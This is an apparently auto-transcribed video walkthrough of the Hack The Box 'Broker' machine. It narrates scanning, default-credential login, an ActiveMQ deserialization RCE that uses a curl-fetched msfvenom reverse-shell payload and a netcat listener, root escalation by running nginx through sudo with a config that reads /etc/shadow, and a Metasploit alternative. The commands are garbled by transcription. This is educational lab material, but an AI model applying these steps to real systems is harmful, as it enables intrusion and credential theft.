Hello, I'm NoxLumens, and today I'm going to be doing a broker from Hackthebox. I will be starting off with a Rust scan. Let's see, we'll be doing -u limit of 5,000, -a for address of 10.129.230.87, Now we can start entering nmap commands, -sc for default scripts, sv enumerate versions, on output in the nmap format into a file called nmap.md. I am going to do it this direction. I'm going to do it this way with nmap.md because I use Obsidian, and Obsidian will input the script data as it runs. It'll import it directly in here, and so I'm able to view it as soon as it finishes. So as soon as this is done, we should see all the data come back. And in the meantime, I see that port 80 is open. So let's go ahead and check that out. GoBuster dir tacu http://1 with a word list of users, share, word list, sec list, discovery, fuzzing, web content, and raft large words lowercase. tac-t for threads with 50 of them, -- no error, and I think that's all I'll use. It looks like we need to exclude length of 43. Is that right? Whoa. Started getting a bunch of output. There we go. So we're just setting, in that instance, I just set a negative status code. I'm going to let that run, and then we can look over here at the nmap scan. As we saw that it finished, as we were going through. So let's highlight this data. Put it into a more friendly format. Specifically, if you call it Python, which it does not, obviously, it appears in a really nice, colorful format, and then we can look at it. So we can see 22 is open, 80, 22, let's see, 80. We see that it's basic realm of ActiveMQ realm, ActiveMQ advisory, let's see, topics and their most recent payloads. Master broker advisory, consumer topics, port 1883, it's MQTT, 5672, identified as AMQP, handshake expected, port 8161, HTTP, 43,593, and then 61613. All things are pointing to ActiveMQ. Apache, what else do we have here? More ActiveMQ. Okay. Let's scroll back up to the top. Grab our Rust scan. And oh man, there we go. This does not seem to be returning anything, so let's go and take a look at the web page. Open the link faster. Whatever. We'll type in admin and we get in. Okay. So port 80. Yeah. 80. Default. Creds login. ActiveMQ. And that was admin. Let's see, apache.org, facts, forums, downloads. You can try to manage it. See some web demos. Apache MQ, Hiram. Graphic design by Hiram. Here we go, some version information. 5.15.15. ActiveMQ exploit. 5.15.15. RCE. We have a CVE. It's a for our version. Copy. Poses an RCE flaw within Apache ActiveMQ. This vulnerability empowers a remote attacker network access to a broker to execute arbitrary shell commands. The attack involves manipulating serialized class types in the OpenWire protocol, prompting the broker to instantiate any invaluable class of the class path. ActiveMQ Unauthenticated Remote Code Execution. Active Metasploit. There's a Metasploit module for it. And then we have this bad boy. Let's look in Go. Use ActiveMQ IP and host. Server import. Spring XML URL. All right, let's git clone this. We found a CVE, which was this one. Hey, bro, I don't want that whole last thing. Just give me the text. There we go. Okay. Git clone this mess. All right. Make dir dub. Remove. Dub. Make directory. CD to it. And paste. Git clone. Let's run in there. CD CV. ls. At. Let's read. Go back to this page. The exploit builds upon the foundational work available here. We have further developed a technique to achieve a reverse shell utilizing the Metasploit framework. Manually change the IP address on line 11 in the XML files with the IP address where the payload will be generated. If you follow the below commands, it will be your listener IP address. So we're going to use MSF Venom to create a payload. Then we're going to host it with Python. We're going to make an ELF file. Okay. Baby doll, don't open up the shit. Copy pasta. What do we have in here? Let's actually, this is fine. We can do this. So we're going to use L port 9001 because we are over 9,000, and then we're going to use lhost of 10.0. And apparently we're going to be using a Linux reverse shell TCP. Okay. And what else? Oh, okay. We're going to need to host it. We need to edit this ActiveMQ IU POC Linux XML. Okay, let's edit that. Let's make sure our exploit test.elf, there it is. Okay. Nano POC Linux.xml. S test.elf. Did we call it? Did we leave it that with that default name? We did. Okay, whatever. It's fine. We're going to use 10.120. Nope. 10.10.14.93 port 9001 test.elf, and then it's going. Okay, so we're curling. We are allowing it to be executable. We're changing it to an executable, and then we're executing it within this command. Shell tax C. Okay. The command below downloads the file and saves it as test.elf. So we could have done any other. Oh wait, I do need to save that. Yeah. Okay. Let's break some windows. So first things first, Python 3 tac m http.server port 80. And then what do we need? I guess that's it. Oh, we need our netcat listener, which we will be putting up here. We're going to RL wrap netcat 9001. And now we need to. We can't run the exe. I wonder if we could use wine to do it. I'm not going to do that, but what is the Go syntax? Let's try Go. Okay, there it is. Go run main.go tac I of server address and 129.230.87 with our address of 10.10.14.93 on 9001 with the file that we're grabbing, which is poc linux.xml. What was the last U? Spring XML URL P active server port default. Okay, we may not need to set that. 6161 is running though. We didn't get a request 10.10.14 because we need to. Oh shit. ls nano poc linux.xml. But did I make the mistake here? 93? No, it's right there. I made the mistake over here. There it is. .93. And our POC is wrong because we need to pull on port 80 to download the file and get us a shell ID. That broke. Okay. Let's try this without. You gonna break? You gonna break? Okay, let's figure this out. 10.10.14.93 poc.linux 129. Kill that. Clear nano. Let's try this instead. Let's see if this works. Rev shells. Hash that guy 10, 10, 14, 93, 9001, copy. Be really interested to see if this actually works. We see the get, we don't see the callback though. Wonder what that has to do with. Command below downloads the file and saves it as test.elf. Yes, it did. Is it this? Will this work? We put it in quotations, X, Y. Enter. Nope. What if will this work? Yeah, that's the thing though. I don't want to encode all of it. What is it? About yeah. I think this is what I'm looking for. Because I think that I think some of the characters are getting like specifically the greater than symbols are getting confused with other things. We'll see if this works. If this doesn't work, we'll go back to the original. Oh my goodness, but it does. Okay. Cool. Let's get rid of that. We can run Nginx. Nginx. Local root exploit. A popular email platform Zimbra. Sudo L. Previously, there was a nice bug in ZMStatFD that permitted taking ownership of files and escalating the root that way. But at some point, the bug was killed. I suspect there are further bugs in that file. However, it's written in Perl. Luckily, we have a nice spot. We can run Nginx's root with whatever configuration file we want to feed it. Immediately, we try something simple. We write a little config to let us read the whole entire file system and dump the shadow file. So I guess we're not super interested in that. We're kind of more interested in root, but let's do a thing. E2 dot, what the hell is this? Shell? No. Curl 10, 10, 14, 93. Wait, what? I think I just confused myself. I definitely confused myself. All right, so let's read from root. F take dot. User root, worker process 4, make config. Okay, let's try to roll the cd temp. Nothing in here. Curl HTTP 10, 10, 14, 93 e2 dot shell output to e2 dot shell. Chmod plus x e2 dot shell. Is that because no, that's the thing. Is it because we need to because I didn't change everything? Oh my goodness. Let's do this again. This will never work. Sudo tac L. User sbin Nginx c nginx.com. Okay. HTTP :/ 10 10 14 93 e2 dot sh to output file e2 dot sh. Chmod x 2 dot shell. Reading root. It really just read the directory. That was it. They're grabbing the shadow file. But with this, we should be able to just make a file or make a directory like active, right? Am I wrong about that? Okay, yeah, we can. We did. Home ActiveMQ user.text. Oh man, how cool is that? Interesting. Okay. User.text. Dude. Root. Root.text. Copy pasta. Cool dudes. Let's go back. I love that this worked. I love that we were able to use this instead of their like L file. I'm surprised that it didn't work like that with the file, because you know, I had gone through this earlier and it did work that way. I didn't do it the same way that I did just now. You know, I used exactly how it came, and then even with this part of the exploit, I never like I set it to the file, and it's just like it did here with the Etsy shadow file. I had it spit out the root and root.txt, but I love that, you know, it's I mean, we're editing a config file. And if we set the file to, you know, point to the like root directory on the server, then we can access as root anything within the server. So figured, why not go ahead and try it that way and then just navigate to it. Obviously, this is pretty dangerous vulnerability. Now, it looks like we could have done it with this Metasploit module. Maybe all versions before 5.15.6. So can we try that as well, just for fun? New. So we're going to start by opening Metasploit with MSF console, TACQ for quiet, and then search ActiveMQ. Use option 4, which we can see is 2023 ActiveMQ Unauthenticated Remote Code Execution. We look at the options. Note a few things. First, that it's trying to use Windows, so let's do set payload to Linux. Show targets. Set target to 1. Set lhost to ton0. Set rhost to 10.129 to 2081. Check options again. I think that there's something else that we need to set options. And yes, there is. The other thing that we need to change is either the server port, or the fetch server port. Set fetch server port to 8081. We should be able to now run this with either run or exploit, and then we should just get back a interpreter shell. See if that works. It doesn't. We'll enter shell, and now we can see that we are actually ActiveMQ. If we look in, we can see that we're in the directory, and then if we go to home, ls cd ActiveMQ, we can have access to the user.txt file. So alternatively, we could have done it this way. If we, for like initial access with this Metasploit module. Hopefully you learned something. If you did, make sure to hit the like button, subscribe, all that shit that doesn't actually matter. However, if you want to see more videos like this, why don't you go ahead and click on this video right here. And you're going to see a whole shit ton of videos. Click on this playlist. Click on the playlist. And come back. I'll see you later.